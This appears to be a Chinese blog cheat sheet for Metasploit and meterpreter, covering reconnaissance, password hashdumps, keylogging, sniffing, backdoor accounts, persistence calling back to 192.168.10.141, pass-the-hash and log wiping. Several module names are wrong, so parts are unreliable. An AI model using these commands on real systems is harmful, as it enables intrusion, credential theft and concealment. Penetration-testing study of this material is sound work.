信息收集阶段

Whois信息收集

msf auxiliary > whois baidu.com

域名信息查询阶段

msf auxiliary > nslookup www.baidu.com

msf auxiliary > dig @114.114.114.114 www.baidu.com



主机端口探测阶段

直接使用PING命令探测连通性

ping 1.2.3.4

msf > use auxiliary/scanner/discovery/arp_sweep

msf > set RHOSTS 1.1.1.0/24

msf > set THREADS 50

msf > run

使用NMAP探测

msf > nmap command

服务扫描打点

telnet服务:use auxiliary/scanner/telnet/telnet_version

ssh服务:use auxiliary/scanner/ssh/telnet_version

Oracle服务:use auxiliary/scanner/oracle/tnslsnr_version

http服务:use auxiliary/scanner/http/open_proxy

口令探测

ssh服务:use auxiliary/scanner/ssh/telnet_login

ftp服务:use auxiliary/sniffer/psnuffle

漏洞扫描阶段

那是nessus openVAS等的天下,可以利用PostgreSQL数据库进行联动

MSF框架下的WEB渗透

为什么不用burpsuite呢,用burpsuite更好

还有SQLMAP啊,还有好多其他的啊,啦啦啦

漏洞利用阶段

选择合适的漏洞利用payload和攻击脚本即可

use xxx

set payload xxx

强大的meterpreter

meterpreter > background 后台运行meterpreter

meterpreter > sessions 列出session,选择交互session的话 使用session -i  x

msterpreter > shell

msterpreter > cat xxxxx 查看文件

msterpreter > getwd/getlwd  获取当下路径

msterpreter > upload xxx.exe c:\  上传文件或文件夹

msterpreter > download c:\\"Program Files"\\xxx\\xxx\\xxx  ./  下载文件

msterpreter > edit 使用vi编辑器编辑目标机上的文件

msterpreter > search 搜索目标上的文件

msterpreter > ipconfig 查看网络信息

msterpreter > portfwd add -l 1234 -p 3389 -r 1.2.3.4 将目标机的3389 转发到本地1234端口

msterpreter > route 查看目标机的路由信息

msterpreter > ps  查看进程表

msterpreter > migrate 转移shell到进程

msterpreter > execute -H -f cmd.exe 隐藏执行cmd

msterpreter > execute -H -i -f cmd.exe 可以与cmd交互了 -m 参数直接在内存执行供给端的可执行文件 execute -H -m -d xxx.exe -f xxx.exe -a "-o xxxx.txt"

msterpreter > getpid 获取当前会话所在进程的pid

msterpreter > getuid /whoami 获取自己是谁

msterpreter > sysinfo  查看系统信息

msterpreter > kill 杀掉进程

msterpreter > shutdown关机

msterpreter > hashdump 获取windows 的hash口令

msterpreter > run persistence -X -i 5 -p 443 -r 192.168.10.141

msterpreter > run metsvc #吧31337端口打开监听meterpreter

msterpreter > run getgui -u metaspolit -p meterpreter 添加账户metaspolit 密码meterpreter

msterpreter > run multi_console_command -rc /root/.msf3/logs/scripts/getgui/clean_up_xxxxxxxx.xxxx.rc

msterpreter > getsystem 提权

msterpreter > run post/windows/gather/dumplinks 获取最近处理的文档

msterpreter > run post/windows/gather/enum_applications 获取安装的程序

msterpreter > keyscan_start 键盘记录

msterpreter > keyscan_dump

msterpreter > keyscan_stop 关闭

msterpreter > use sniffer #网络监听获取密码

msterpreter > sniffer_interface

msterpreter > sniffer_start 1

msterpreter > sniffer_dump 1 /tmp/xxx.pcap

msterpreter > sniffer_stop 1

msterpreter > run post/windows/gather/enum_ie 浏览器获取密码

msterpreter > run windows/gather/smart_hashdump 获取系统口令

msterpreter > run get_local_subnets 添加路由

msterpreter > background 后 route add a.b.c.d x.x.x.x 1 然后查看route print

msf > use exploit/windows/smb/psexec

msf > set RHOST RPORT LHOST ...

msf > set SMBPass hash值

msf > exploit

msterpreter > clearev 删除日志

msterpreter >timestomp 停止修改文件属性的时间记录

Metaspolit使用简介的更多相关文章

  1. 关于metaspolit中进行JAVA反序列化渗透RMI的原理分析

    一.背景: 这里需要对java反序列化有点了解,在这里得推广下自己的博客嘛,虽然写的不好,广告还是要做的.原谅我: 1.java反序列化漏洞原理研习 2.java反序列化漏洞的检测 二.攻击手法简介 ...

  2. ASP.NET Core 1.1 简介

    ASP.NET Core 1.1 于2016年11月16日发布.这个版本包括许多伟大的新功能以及许多错误修复和一般的增强.这个版本包含了多个新的中间件组件.针对Windows的WebListener服 ...

  3. MVVM模式和在WPF中的实现(一)MVVM模式简介

    MVVM模式解析和在WPF中的实现(一) MVVM模式简介 系列目录: MVVM模式解析和在WPF中的实现(一)MVVM模式简介 MVVM模式解析和在WPF中的实现(二)数据绑定 MVVM模式解析和在 ...

  4. Cassandra简介

    在前面的一篇文章<图形数据库Neo4J简介>中,我们介绍了一种非常流行的图形数据库Neo4J的使用方法.而在本文中,我们将对另外一种类型的NoSQL数据库——Cassandra进行简单地介 ...

  5. REST简介

    一说到REST,我想大家的第一反应就是“啊,就是那种前后台通信方式.”但是在要求详细讲述它所提出的各个约束,以及如何开始搭建REST服务时,却很少有人能够清晰地说出它到底是什么,需要遵守什么样的准则. ...

  6. Microservice架构模式简介

    在2014年,Sam Newman,Martin Fowler在ThoughtWorks的一位同事,出版了一本新书<Building Microservices>.该书描述了如何按照Mic ...

  7. const,static,extern 简介

    const,static,extern 简介 一.const与宏的区别: const简介:之前常用的字符串常量,一般是抽成宏,但是苹果不推荐我们抽成宏,推荐我们使用const常量. 执行时刻:宏是预编 ...

  8. HTTPS简介

    一.简单总结 1.HTTPS概念总结 HTTPS 就是对HTTP进行了TLS或SSL加密. 应用层的HTTP协议通过传输层的TCP协议来传输,HTTPS 在 HTTP和 TCP中间加了一层TLS/SS ...

  9. 【Machine Learning】机器学习及其基础概念简介

    机器学习及其基础概念简介 作者:白宁超 2016年12月23日21:24:51 摘要:随着机器学习和深度学习的热潮,各种图书层出不穷.然而多数是基础理论知识介绍,缺乏实现的深入理解.本系列文章是作者结 ...

随机推荐

  1. 创建 React-Native 工程时,如何指定特定的 React-Native 版本

    react-native 可能会出现一种情况,就是版本最高的可能出现有些东西不太稳定,这时候要用到旧的版本怎么办?就可以用以下方法创建项目. 0. 原因 创建新的 React-Native (以下简称 ...

  2. SCXcodeSwitchExpander自动填充switch语句下枚举类型case

    下载地址:https://github.com/stefanceriu/SCXcodeSwitchExpander 跟VVDocumenter规范注释生成器的安装方式一样: 下载开源工程在Xcode重 ...

  3. SharePoint 2013 处理videoplayerpage.aspx下的个人图片显示有误问题

    问题: Personal site's photo can't correct display in the videos page The url address of personal site' ...

  4. Android学习之——ListView

    背景知识 ListView在Android应用中使用非常广泛,手机上必备的微博.网易新闻等,都使用了ListView.

  5. git push 不再需要重复输入账户密码的技巧

    添加用户环境变量 计算机—属性—高级系统设置—环境变量 变量名 HOME 变量值%USERPROFILE% 在用户文件夹C:\Users\YourName下新建一个名为_netrc的文件 machin ...

  6. RancherOS(ROS)如何安装到硬盘? 并设置为用户自动登录到系统? -a rancher.autologin=tty1

    RancherOS 安装到硬盘,一般都是通过ssh_authorized_keys 方式. ------------------------------------------- 从第一次认识到这个方 ...

  7. php解析mpp文件中的多级任务

    获取层级的project任务  参考 启动javabridge java -jar JavaBridge.jar SERVLET_LOCAL:8089 1.读取mpp文件 $file_path = & ...

  8. node.js富文本编辑器

    摘要: 最近在搭建自己的博客,这一段时间可能没有时间来写博客了,但是有了好东西还是要分享给大家.博客网站必然要有编辑文章的编辑器,所以在网上查了些资料.大部分编辑器的后台是基于java.php.asp ...

  9. python qq邮箱发送邮件

    使用qq发送邮件 # coding=utf8 """ qq邮箱发送邮件 """ import sys reload(sys) sys.set ...

  10. 使用Matplotlib画图系列(一)

    实现一个最简单的plot函数调用: import matplotlib.pyplot as plt y=pp.DS.Transac_open # 设置y轴数据,以数组形式提供 x=len(y) # 设 ...